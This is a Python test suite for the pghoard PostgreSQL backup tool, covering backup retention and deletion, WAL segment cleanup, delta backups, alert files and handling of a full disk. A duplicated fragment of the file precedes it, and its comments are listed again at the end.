json.dump({ "start-wal-segment": wals[0], "start-time": start_time.isoformat(), }, fp) for wal in wals: with open(os.path.join(wal_storage_path, wal), "wb") as fp: fp.write(b"something") backups_and_wals = { "2015-08-25_0": [ # NOTE: gap between this and next segment means that cleanup shouldn't find this "000000010000000A000000FB", ], "2015-08-25_1": [ "000000020000000A000000FD", "000000020000000A000000FE", ], "2015-08-25_2": [ "000000030000000A000000FF", "000000030000000B00000000", "000000030000000B00000001", "000000040000000B00000002", ], "2015-08-25_3": [ # Both of these should be saved "000000040000000B00000003", "000000040000000B00000004", ], } write_backup_and_wal_files(backups_and_wals) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 4 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 assert len(os.listdir(wal_storage_path)) == 3 # Put all WAL segments between 1 and 9 in place to see that they're deleted and we don't try to go back # any further from TLI 1. Note that timeline 3 is now "empty" so deletion shouldn't touch timelines 2 # or 1. new_backups_and_wals = { "": [ "000000020000000A000000FC", "000000020000000A000000FD", "000000020000000A000000FE", "000000020000000A000000FF", "000000020000000B00000000", "000000020000000B00000001", "000000020000000B00000002", ], "2015-08-25_4": [ "000000040000000B00000005", ], } write_backup_and_wal_files(new_backups_and_wals) assert len(os.listdir(wal_storage_path)) == 11 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 expected_wal_count = len(backups_and_wals["2015-08-25_0"]) expected_wal_count += len(new_backups_and_wals[""]) expected_wal_count += len(new_backups_and_wals["2015-08-25_4"]) assert len(os.listdir(wal_storage_path)) == expected_wal_count # Now put WAL files in place with no gaps anywhere gapless_backups_and_wals = { "2015-08-25_3": [ "000000030000000B00000003", "000000040000000B00000004", ], "2015-08-25_4": [ "000000040000000B00000005", ], } write_backup_and_wal_files(gapless_backups_and_wals) assert len(os.listdir(wal_storage_path)) >= 10 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 assert len(os.listdir(wal_storage_path)) == 1 def test_local_refresh_backup_list_and_delete_old_delta_format(self): basebackup_storage_path = os.path.join(self.local_storage_dir, "basebackup") basebackup_delta_path = os.path.join(self.local_storage_dir, "basebackup_delta") os.makedirs(basebackup_storage_path) os.makedirs(basebackup_delta_path) self.pghoard.set_state_defaults(self.test_site) assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] def write_backup_files(what): for bb, bb_data in what.items(): wal_start, hexdigests = bb_data if bb: bb_path = os.path.join(basebackup_storage_path, bb) date_parts = [int(part) for part in bb.replace("_", "-").split("-")] start_time = datetime.datetime(*date_parts, tzinfo=datetime.timezone.utc) metadata = { "manifest": { "snapshot_result": { "state": { "files": [{ "relative_path": h, "hexdigest": h } for h in hexdigests] } } } } mtime = time.time() blob = io.BytesIO(common.json_encode(metadata, binary=True)) ti = tarfile.TarInfo(name=".pghoard_tar_metadata.json") ti.size = len(blob.getbuffer()) ti.mtime = mtime with open(bb_path, "wb") as fp: with rohmufile.file_writer( compression_algorithm="snappy", compression_level=0, fileobj=fp ) as output_obj: with tarfile.TarFile(fileobj=output_obj, mode="w") as tar: tar.addfile(ti, blob) input_size = output_obj.tell() for h in hexdigests: with open(Path(basebackup_delta_path) / h, "w") as digest_file, \ open((Path(basebackup_delta_path) / (h + ".metadata")), "w") as digest_meta_file: json.dump({}, digest_file) json.dump({}, digest_meta_file) with open(bb_path + ".metadata", "w") as fp: json.dump({ "start-wal-segment": wal_start, "start-time": start_time.isoformat(), "format": BaseBackupFormat.delta_v1, "compression-algorithm": "snappy", "original-file-size": input_size }, fp) backups_and_delta = { "2015-08-25_0": ( "000000010000000A000000AA", [ "<KEY>", "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" ] ), "2015-08-25_1": [ "000000020000000A000000AB", ["<KEY>"] ], "2015-08-25_2": [ "000000030000000A000000AC", ["214967296374cae6f099e19910b33a0893f0abc62f50601baa2875ab055cd27b"] ], "2015-08-25_3": [ "000000040000000B00000003", [ "<KEY>", "<KEY>" ] ], } write_backup_files(backups_and_delta) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 4 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 left_delta_files = [p for p in os.listdir(basebackup_delta_path) if not p.endswith(".metadata")] assert sorted(left_delta_files) == [ "<KEY>", "<KEY>" ] new_delta_data = { "2015-08-25_4": ( "000000040000000B00000004", [ "fc61c91430dcb345001306ad513f103380c16896093a17868fc909aeda393559", ] ) } write_backup_files(new_delta_data) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 2 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 left_delta_files = [p for p in os.listdir(basebackup_delta_path) if not p.endswith(".metadata")] assert sorted(left_delta_files) == [ "fc61c91430dcb345001306ad513f103380c16896093a17868fc909aeda393559", ] def test_alert_files(self): alert_file_path = os.path.join(self.config["alert_file_dir"], "test_alert") create_alert_file(self.pghoard.config, "test_alert") assert os.path.exists(alert_file_path) is True delete_alert_file(self.pghoard.config, "test_alert") assert os.path.exists(alert_file_path) is False def test_backup_state_file(self): self.pghoard.write_backup_state_to_json_file() state_path = self.config["json_state_file_path"] with open(state_path, "r") as fp: state = json.load(fp) empty_state = { "startup_time": self.pghoard.state["startup_time"], "backup_sites": {}, "compressors": [{}] * self.config["compression"]["thread_count"], "queues": { "compression_queue": 0, "transfer_queue": 0, }, "served_files": {}, "transfer_agent_state": {}, "pg_receivexlogs": {}, "pg_basebackups": {}, "walreceivers": {}, } assert empty_state == state def test_startup_walk_for_missed_compressed_files(self): compressed_wal_path, _ = self.pghoard.create_backup_site_paths(self.test_site) with open(os.path.join(compressed_wal_path, "000000010000000000000004"), "wb") as fp: fp.write(b"foo") with open(os.path.join(compressed_wal_path, "000000010000000000000004.metadata"), "wb") as fp: fp.write(b"{}") with open(os.path.join(compressed_wal_path, "0000000F.history"), "wb") as fp: fp.write(b"foo") with open(os.path.join(compressed_wal_path, "0000000F.history.metadata"), "wb") as fp: fp.write(b"{}") with open(os.path.join(compressed_wal_path, "000000010000000000000004xyz"), "wb") as fp: fp.write(b"foo") with open(os.path.join(compressed_wal_path, "000000010000000000000004xyz.metadata"), "wb") as fp: fp.write(b"{}") self.pghoard.startup_walk_for_missed_files() assert self.pghoard.compression_queue.qsize() == 0 assert self.pghoard.transfer_queue.qsize() == 2 def test_startup_walk_for_missed_uncompressed_files(self): compressed_wal_path, _ = self.pghoard.create_backup_site_paths(self.test_site) uncompressed_wal_path = compressed_wal_path + "_incoming" with open(os.path.join(uncompressed_wal_path, "000000010000000000000004"), "wb") as fp: fp.write(b"foo") with open(os.path.join(uncompressed_wal_path, "00000002.history"), "wb") as fp: fp.write(b"foo") with open(os.path.join(uncompressed_wal_path, "000000010000000000000004xyz"), "wb") as fp: fp.write(b"foo") self.pghoard.startup_walk_for_missed_files() assert self.pghoard.compression_queue.qsize() == 2 assert self.pghoard.transfer_queue.qsize() == 0 class TestPGHoardWithPG: def test_auth_alert_files(self, db, pghoard): def clean_alert_files(): for f in os.listdir(pghoard.config["alert_file_dir"]): os.unlink(os.path.join(pghoard.config["alert_file_dir"], f)) # connecting using the proper user should work and not yield any alerts clean_alert_files() conn_str = create_connection_string(db.user) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is not None assert os.listdir(pghoard.config["alert_file_dir"]) == [] # nonexistent user should yield a configuration error # Make sure we're not caching the pg_version del pghoard.config["backup_sites"][pghoard.test_site]["pg_version"] clean_alert_files() conn_str = create_connection_string(dict(db.user, user="nonexistent")) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is None assert os.listdir(pghoard.config["alert_file_dir"]) == ["configuration_error"] # so should the disabled user clean_alert_files() conn_str = create_connection_string(dict(db.user, user="disabled")) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is None assert os.listdir(pghoard.config["alert_file_dir"]) == ["configuration_error"] # existing user with an invalid password should cause an authentication error clean_alert_files() conn_str = create_connection_string(dict(db.user, user="<PASSWORD>")) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is None assert os.listdir(pghoard.config["alert_file_dir"]) == ["authentication_error"] def test_pause_on_disk_full(self, db, pghoard_separate_volume, caplog): pghoard = pghoard_separate_volume conn = db.connect() conn.autocommit = True wal_directory = os.path.join(pghoard.config["backup_location"], pghoard.test_site, "xlog_incoming") os.makedirs(wal_directory, exist_ok=True) pghoard.receivexlog_listener(pghoard.test_site, db.user, wal_directory) # Create 15 new WAL segments in very quick succession. Our volume for incoming WALs is only 150 # MiB so if logic for automatically suspending pg_receive(xlog|wal) wasn't working the volume # would certainly fill up and the files couldn't be processed. Now this should work fine. for _ in range(16): # Note: do not combine two function call in one select, PG executes it differently and # sometimes looks like it generates less WAL files than we wanted switch_wal(conn) conn.close() wait_for_xlog(pghoard, 15) assert "pausing pg_receive(wal|xlog)" in caplog.text def test_surviving_pg_receivewal_hickup(self, db, pghoard): wal_directory = os.path.join(pghoard.config["backup_location"], pghoard.test_site, "xlog_incoming") os.makedirs(wal_directory, exist_ok=True) pghoard.receivexlog_listener(pghoard.test_site, db.user, wal_directory) conn = db.connect() conn.autocommit = True # Make sure we have already a few files so pg_receivewal has something to start from when it eventually restarts # +1: to finish the current one for _ in range(3 + 1): switch_wal(conn) wait_for_xlog(pghoard, 3) # stop pg_receivewal so we cannot process new WAL segments pghoard.receivexlogs[pghoard.test_site].running = False if pghoard.receivexlogs[pghoard.test_site].is_alive(): pghoard.receivexlogs[pghoard.test_site].join() del pghoard.receivexlogs[pghoard.test_site] n_xlogs = pghoard.transfer_agent_state[pghoard.test_site]["upload"]["xlog"]["xlogs_since_basebackup"] # add more WAL segments for _ in range(10): switch_wal(conn) conn.close() # restart pghoard.receivexlog_listener(pghoard.test_site, db.user, wal_directory) assert pghoard.receivexlogs[pghoard.test_site].is_alive() # We should now process all created segments, not only the ones which were created after pg_receivewal was restarted wait_for_xlog(pghoard, n_xlogs + 10)
<filename>test/test_pghoard.py """ pghoard Copyright (c) 2015 Ohmu Ltd See LICENSE for details """ import datetime import io import json import os import tarfile import time from pathlib import Path from unittest.mock import Mock, patch from pghoard import common from pghoard.common import (BaseBackupFormat, create_alert_file, delete_alert_file, write_json_file) from pghoard.pghoard import PGHoard from pghoard.pgutil import create_connection_string # pylint: disable=attribute-defined-outside-init from pghoard.rohmu import rohmufile from .base import PGHoardTestCase from .util import switch_wal, wait_for_xlog class TestPGHoard(PGHoardTestCase): def setup_method(self, method): super().setup_method(method) self.config = self.config_template({ "backup_sites": { self.test_site: { "basebackup_count": 1, "basebackup_interval_hours": 1, "nodes": [ { "host": "127.0.0.4", }, ], }, }, }) config_path = os.path.join(self.temp_dir, "pghoard.json") write_json_file(config_path, self.config) self.pghoard = PGHoard(config_path) # This is the "final storage location" when using "local" storage type self.local_storage_dir = os.path.join( self.config["backup_sites"][self.test_site]["object_storage"]["directory"], self.test_site ) self.real_check_pg_server_version = self.pghoard.check_pg_server_version self.pghoard.check_pg_server_version = Mock(return_value=90404) self.real_check_pg_versions_ok = self.pghoard.check_pg_versions_ok self.pghoard.check_pg_versions_ok = Mock(return_value=True) def teardown_method(self, method): self.pghoard.quit() self.pghoard.check_pg_server_version = self.real_check_pg_server_version self.pghoard.check_pg_versions_ok = self.real_check_pg_versions_ok super().teardown_method(method) @patch("subprocess.check_output") def test_handle_site(self, subprocess_mock): subprocess_mock.return_value = b"""\ systemid|6222667313856416063 timeline|1 xlogpos|0/B003760 dbname|""" self.pghoard.handle_site(self.test_site, self.config["backup_sites"][self.test_site]) assert len(self.pghoard.receivexlogs) == 1 or len(self.pghoard.walreceivers) == 1 assert len(self.pghoard.time_of_last_backup_check) == 1 def test_get_local_basebackups_info(self): basebackup_storage_path = os.path.join(self.local_storage_dir, "basebackup") os.makedirs(basebackup_storage_path) assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] bb_path = os.path.join(basebackup_storage_path, "2015-07-03_0") # Handle case where metadata file does not exist assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] metadata_file_path = bb_path + ".metadata" with open(bb_path, "wb") as fp: fp.write(b"something") with open(metadata_file_path, "w") as fp: json.dump({"start-time": "2015-07-03 12:00:00+00:00"}, fp) available_backup = self.pghoard.get_remote_basebackups_info(self.test_site)[0] assert available_backup["name"] == "2015-07-03_0" start_time = datetime.datetime(2015, 7, 3, 12, tzinfo=datetime.timezone.utc) assert available_backup["metadata"]["start-time"] == start_time assert available_backup["metadata"]["backup-reason"] == "scheduled" assert available_backup["metadata"]["normalized-backup-time"] is None assert available_backup["metadata"]["backup-decision-time"] bb_path = os.path.join(basebackup_storage_path, "2015-07-02_9") metadata_file_path = bb_path + ".metadata" with open(bb_path, "wb") as fp: fp.write(b"something") with open(metadata_file_path, "w") as fp: json.dump({"start-time": "2015-07-02 12:00:00+00:00"}, fp) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert basebackups[0]["name"] == "2015-07-02_9" assert basebackups[1]["name"] == "2015-07-03_0" bb_path = os.path.join(basebackup_storage_path, "2015-07-02_10") metadata_file_path = bb_path + ".metadata" with open(bb_path, "wb") as fp: fp.write(b"something") with open(metadata_file_path, "w") as fp: json.dump({"start-time": "2015-07-02 22:00:00+00"}, fp) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert basebackups[0]["name"] == "2015-07-02_9" assert basebackups[1]["name"] == "2015-07-02_10" assert basebackups[2]["name"] == "2015-07-03_0" def test_determine_backups_to_delete(self): now = datetime.datetime.now(datetime.timezone.utc) bbs = [ { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=10, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=9, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=9, hours=1) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=8, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=7, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=6, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=6, hours=20) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=5, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=4, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=3, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=2, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=1, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(hours=4) } }, ] site_config = { "basebackup_count": 4, "basebackup_count_min": 2, "basebackup_interval_hours": 24, } bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) assert len(bbs_copy) == 4 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count"] = 16 site_config["basebackup_age_days_max"] = 8 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # 3 of the backups are too old (start time + interval is over 8 days in the past) assert len(bbs_copy) == 10 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count"] = 9 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # basebackup_count trumps backup age and backups are removed even though they're not too old assert len(bbs_copy) == 9 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count"] = 16 site_config["basebackup_age_days_max"] = 2 site_config["basebackup_count_min"] = 6 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # basebackup_count_min ensures not that many backups are removed even though they're too old assert len(bbs_copy) == 6 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count_min"] = 2 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # 3 of the backups are new enough (start time less than 3 days in the past) assert len(bbs_copy) == 3 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] # Basebackups are disabled for this site (basebackup_interval_hours=None) # verify that determine_backups_to_delete still executes correctly site_config = {"basebackup_count": 4, "basebackup_count_min": 2, "basebackup_interval_hours": None} bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) assert len(bbs_copy) == 4 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] def test_local_refresh_backup_list_and_delete_old(self): basebackup_storage_path = os.path.join(self.local_storage_dir, "basebackup") wal_storage_path = os.path.join(self.local_storage_dir, "xlog") os.makedirs(basebackup_storage_path) os.makedirs(wal_storage_path) self.pghoard.set_state_defaults(self.test_site) assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] def write_backup_and_wal_files(what): for bb, wals in what.items(): if bb: bb_path = os.path.join(basebackup_storage_path, bb) date_parts = [int(part) for part in bb.replace("_", "-").split("-")] start_time = datetime.datetime(*date_parts, tzinfo=datetime.timezone.utc) with open(bb_path, "wb") as fp: fp.write(b"something") with open(bb_path + ".metadata", "w") as fp: json.dump({ "start-wal-segment": wals[0], "start-time": start_time.isoformat(), }, fp) for wal in wals: with open(os.path.join(wal_storage_path, wal), "wb") as fp: fp.write(b"something") backups_and_wals = { "2015-08-25_0": [ # NOTE: gap between this and next segment means that cleanup shouldn't find this "000000010000000A000000FB", ], "2015-08-25_1": [ "000000020000000A000000FD", "000000020000000A000000FE", ], "2015-08-25_2": [ "000000030000000A000000FF", "000000030000000B00000000", "000000030000000B00000001", "000000040000000B00000002", ], "2015-08-25_3": [ # Both of these should be saved "000000040000000B00000003", "000000040000000B00000004", ], } write_backup_and_wal_files(backups_and_wals) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 4 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 assert len(os.listdir(wal_storage_path)) == 3 # Put all WAL segments between 1 and 9 in place to see that they're deleted and we don't try to go back # any further from TLI 1. Note that timeline 3 is now "empty" so deletion shouldn't touch timelines 2 # or 1. new_backups_and_wals = { "": [ "000000020000000A000000FC", "000000020000000A000000FD", "000000020000000A000000FE", "000000020000000A000000FF", "000000020000000B00000000", "000000020000000B00000001", "000000020000000B00000002", ], "2015-08-25_4": [ "000000040000000B00000005", ], } write_backup_and_wal_files(new_backups_and_wals) assert len(os.listdir(wal_storage_path)) == 11 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 expected_wal_count = len(backups_and_wals["2015-08-25_0"]) expected_wal_count += len(new_backups_and_wals[""]) expected_wal_count += len(new_backups_and_wals["2015-08-25_4"]) assert len(os.listdir(wal_storage_path)) == expected_wal_count # Now put WAL files in place with no gaps anywhere gapless_backups_and_wals = { "2015-08-25_3": [ "000000030000000B00000003", "000000040000000B00000004", ], "2015-08-25_4": [ "000000040000000B00000005", ], } write_backup_and_wal_files(gapless_backups_and_wals) assert len(os.listdir(wal_storage_path)) >= 10 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 assert len(os.listdir(wal_storage_path)) == 1 def test_local_refresh_backup_list_and_delete_old_delta_format(self): basebackup_storage_path = os.path.join(self.local_storage_dir, "basebackup") basebackup_delta_path = os.path.join(self.local_storage_dir, "basebackup_delta") os.makedirs(basebackup_storage_path) os.makedirs(basebackup_delta_path) self.pghoard.set_state_defaults(self.test_site) assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] def write_backup_files(what): for bb, bb_data in what.items(): wal_start, hexdigests = bb_data if bb: bb_path = os.path.join(basebackup_storage_path, bb) date_parts = [int(part) for part in bb.replace("_", "-").split("-")] start_time = datetime.datetime(*date_parts, tzinfo=datetime.timezone.utc) metadata = { "manifest": { "snapshot_result": { "state": { "files": [{ "relative_path": h, "hexdigest": h } for h in hexdigests] } } } } mtime = time.time() blob = io.BytesIO(common.json_encode(metadata, binary=True)) ti = tarfile.TarInfo(name=".pghoard_tar_metadata.json") ti.size = len(blob.getbuffer()) ti.mtime = mtime with open(bb_path, "wb") as fp: with rohmufile.file_writer( compression_algorithm="snappy", compression_level=0, fileobj=fp ) as output_obj: with tarfile.TarFile(fileobj=output_obj, mode="w") as tar: tar.addfile(ti, blob) input_size = output_obj.tell() for h in hexdigests: with open(Path(basebackup_delta_path) / h, "w") as digest_file, \ open((Path(basebackup_delta_path) / (h + ".metadata")), "w") as digest_meta_file: json.dump({}, digest_file) json.dump({}, digest_meta_file) with open(bb_path + ".metadata", "w") as fp: json.dump({ "start-wal-segment": wal_start, "start-time": start_time.isoformat(), "format": BaseBackupFormat.delta_v1, "compression-algorithm": "snappy", "original-file-size": input_size }, fp) backups_and_delta = { "2015-08-25_0": ( "000000010000000A000000AA", [ "<KEY>", "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" ] ), "2015-08-25_1": [ "000000020000000A000000AB", ["<KEY>"] ], "2015-08-25_2": [ "000000030000000A000000AC", ["214967296374cae6f099e19910b33a0893f0abc62f50601baa2875ab055cd27b"] ], "2015-08-25_3": [ "000000040000000B00000003", [ "<KEY>", "<KEY>" ] ], } write_backup_files(backups_and_delta) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 4 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 left_delta_files = [p for p in os.listdir(basebackup_delta_path) if not p.endswith(".metadata")] assert sorted(left_delta_files) == [ "<KEY>", "<KEY>" ] new_delta_data = { "2015-08-25_4": ( "000000040000000B00000004", [ "fc61c91430dcb345001306ad513f103380c16896093a17868fc909aeda393559", ] ) } write_backup_files(new_delta_data) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 2 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 left_delta_files = [p for p in os.listdir(basebackup_delta_path) if not p.endswith(".metadata")] assert sorted(left_delta_files) == [ "fc61c91430dcb345001306ad513f103380c16896093a17868fc909aeda393559", ] def test_alert_files(self): alert_file_path = os.path.join(self.config["alert_file_dir"], "test_alert") create_alert_file(self.pghoard.config, "test_alert") assert os.path.exists(alert_file_path) is True delete_alert_file(self.pghoard.config, "test_alert") assert os.path.exists(alert_file_path) is False def test_backup_state_file(self): self.pghoard.write_backup_state_to_json_file() state_path = self.config["json_state_file_path"] with open(state_path, "r") as fp: state = json.load(fp) empty_state = { "startup_time": self.pghoard.state["startup_time"], "backup_sites": {}, "compressors": [{}] * self.config["compression"]["thread_count"], "queues": { "compression_queue": 0, "transfer_queue": 0, }, "served_files": {}, "transfer_agent_state": {}, "pg_receivexlogs": {}, "pg_basebackups": {}, "walreceivers": {}, } assert empty_state == state def test_startup_walk_for_missed_compressed_files(self): compressed_wal_path, _ = self.pghoard.create_backup_site_paths(self.test_site) with open(os.path.join(compressed_wal_path, "000000010000000000000004"), "wb") as fp: fp.write(b"foo") with open(os.path.join(compressed_wal_path, "000000010000000000000004.metadata"), "wb") as fp: fp.write(b"{}") with open(os.path.join(compressed_wal_path, "0000000F.history"), "wb") as fp: fp.write(b"foo") with open(os.path.join(compressed_wal_path, "0000000F.history.metadata"), "wb") as fp: fp.write(b"{}") with open(os.path.join(compressed_wal_path, "000000010000000000000004xyz"), "wb") as fp: fp.write(b"foo") with open(os.path.join(compressed_wal_path, "000000010000000000000004xyz.metadata"), "wb") as fp: fp.write(b"{}") self.pghoard.startup_walk_for_missed_files() assert self.pghoard.compression_queue.qsize() == 0 assert self.pghoard.transfer_queue.qsize() == 2 def test_startup_walk_for_missed_uncompressed_files(self): compressed_wal_path, _ = self.pghoard.create_backup_site_paths(self.test_site) uncompressed_wal_path = compressed_wal_path + "_incoming" with open(os.path.join(uncompressed_wal_path, "000000010000000000000004"), "wb") as fp: fp.write(b"foo") with open(os.path.join(uncompressed_wal_path, "00000002.history"), "wb") as fp: fp.write(b"foo") with open(os.path.join(uncompressed_wal_path, "000000010000000000000004xyz"), "wb") as fp: fp.write(b"foo") self.pghoard.startup_walk_for_missed_files() assert self.pghoard.compression_queue.qsize() == 2 assert self.pghoard.transfer_queue.qsize() == 0 class TestPGHoardWithPG: def test_auth_alert_files(self, db, pghoard): def clean_alert_files(): for f in os.listdir(pghoard.config["alert_file_dir"]): os.unlink(os.path.join(pghoard.config["alert_file_dir"], f)) # connecting using the proper user should work and not yield any alerts clean_alert_files() conn_str = create_connection_string(db.user) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is not None assert os.listdir(pghoard.config["alert_file_dir"]) == [] # nonexistent user should yield a configuration error # Make sure we're not caching the pg_version del pghoard.config["backup_sites"][pghoard.test_site]["pg_version"] clean_alert_files() conn_str = create_connection_string(dict(db.user, user="nonexistent")) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is None assert os.listdir(pghoard.config["alert_file_dir"]) == ["configuration_error"] # so should the disabled user clean_alert_files() conn_str = create_connection_string(dict(db.user, user="disabled")) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is None assert os.listdir(pghoard.config["alert_file_dir"]) == ["configuration_error"] # existing user with an invalid password should cause an authentication error clean_alert_files() conn_str = create_connection_string(dict(db.user, user="<PASSWORD>")) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is None assert os.listdir(pghoard.config["alert_file_dir"]) == ["authentication_error"] def test_pause_on_disk_full(self, db, pghoard_separate_volume, caplog): pghoard = pghoard_separate_volume conn = db.connect() conn.autocommit = True wal_directory = os.path.join(pghoard.config["backup_location"], pghoard.test_site, "xlog_incoming") os.makedirs(wal_directory, exist_ok=True) pghoard.receivexlog_listener(pghoard.test_site, db.user, wal_directory) # Create 15 new WAL segments in very quick succession. Our volume for incoming WALs is only 150 # MiB so if logic for automatically suspending pg_receive(xlog|wal) wasn't working the volume # would certainly fill up and the files couldn't be processed. Now this should work fine. for _ in range(16): # Note: do not combine two function call in one select, PG executes it differently and # sometimes looks like it generates less WAL files than we wanted switch_wal(conn) conn.close() wait_for_xlog(pghoard, 15) assert "pausing pg_receive(wal|xlog)" in caplog.text def test_surviving_pg_receivewal_hickup(self, db, pghoard): wal_directory = os.path.join(pghoard.config["backup_location"], pghoard.test_site, "xlog_incoming") os.makedirs(wal_directory, exist_ok=True) pghoard.receivexlog_listener(pghoard.test_site, db.user, wal_directory) conn = db.connect() conn.autocommit = True # Make sure we have already a few files so pg_receivewal has something to start from when it eventually restarts # +1: to finish the current one for _ in range(3 + 1): switch_wal(conn) wait_for_xlog(pghoard, 3) # stop pg_receivewal so we cannot process new WAL segments pghoard.receivexlogs[pghoard.test_site].running = False if pghoard.receivexlogs[pghoard.test_site].is_alive(): pghoard.receivexlogs[pghoard.test_site].join() del pghoard.receivexlogs[pghoard.test_site] n_xlogs = pghoard.transfer_agent_state[pghoard.test_site]["upload"]["xlog"]["xlogs_since_basebackup"] # add more WAL segments for _ in range(10): switch_wal(conn) conn.close() # restart pghoard.receivexlog_listener(pghoard.test_site, db.user, wal_directory) assert pghoard.receivexlogs[pghoard.test_site].is_alive() # We should now process all created segments, not only the ones which were created after pg_receivewal was restarted wait_for_xlog(pghoard, n_xlogs + 10)
en
0.942438
pghoard Copyright (c) 2015 Ohmu Ltd See LICENSE for details # pylint: disable=attribute-defined-outside-init # This is the "final storage location" when using "local" storage type \ systemid|6222667313856416063 timeline|1 xlogpos|0/B003760 dbname| # Handle case where metadata file does not exist # 3 of the backups are too old (start time + interval is over 8 days in the past) # basebackup_count trumps backup age and backups are removed even though they're not too old # basebackup_count_min ensures not that many backups are removed even though they're too old # 3 of the backups are new enough (start time less than 3 days in the past) # Basebackups are disabled for this site (basebackup_interval_hours=None) # verify that determine_backups_to_delete still executes correctly # NOTE: gap between this and next segment means that cleanup shouldn't find this # Both of these should be saved # Put all WAL segments between 1 and 9 in place to see that they're deleted and we don't try to go back # any further from TLI 1. Note that timeline 3 is now "empty" so deletion shouldn't touch timelines 2 # or 1. # Now put WAL files in place with no gaps anywhere # connecting using the proper user should work and not yield any alerts # nonexistent user should yield a configuration error # Make sure we're not caching the pg_version # so should the disabled user # existing user with an invalid password should cause an authentication error # Create 15 new WAL segments in very quick succession. Our volume for incoming WALs is only 150 # MiB so if logic for automatically suspending pg_receive(xlog|wal) wasn't working the volume # would certainly fill up and the files couldn't be processed. Now this should work fine. # Note: do not combine two function call in one select, PG executes it differently and # sometimes looks like it generates less WAL files than we wanted # Make sure we have already a few files so pg_receivewal has something to start from when it eventually 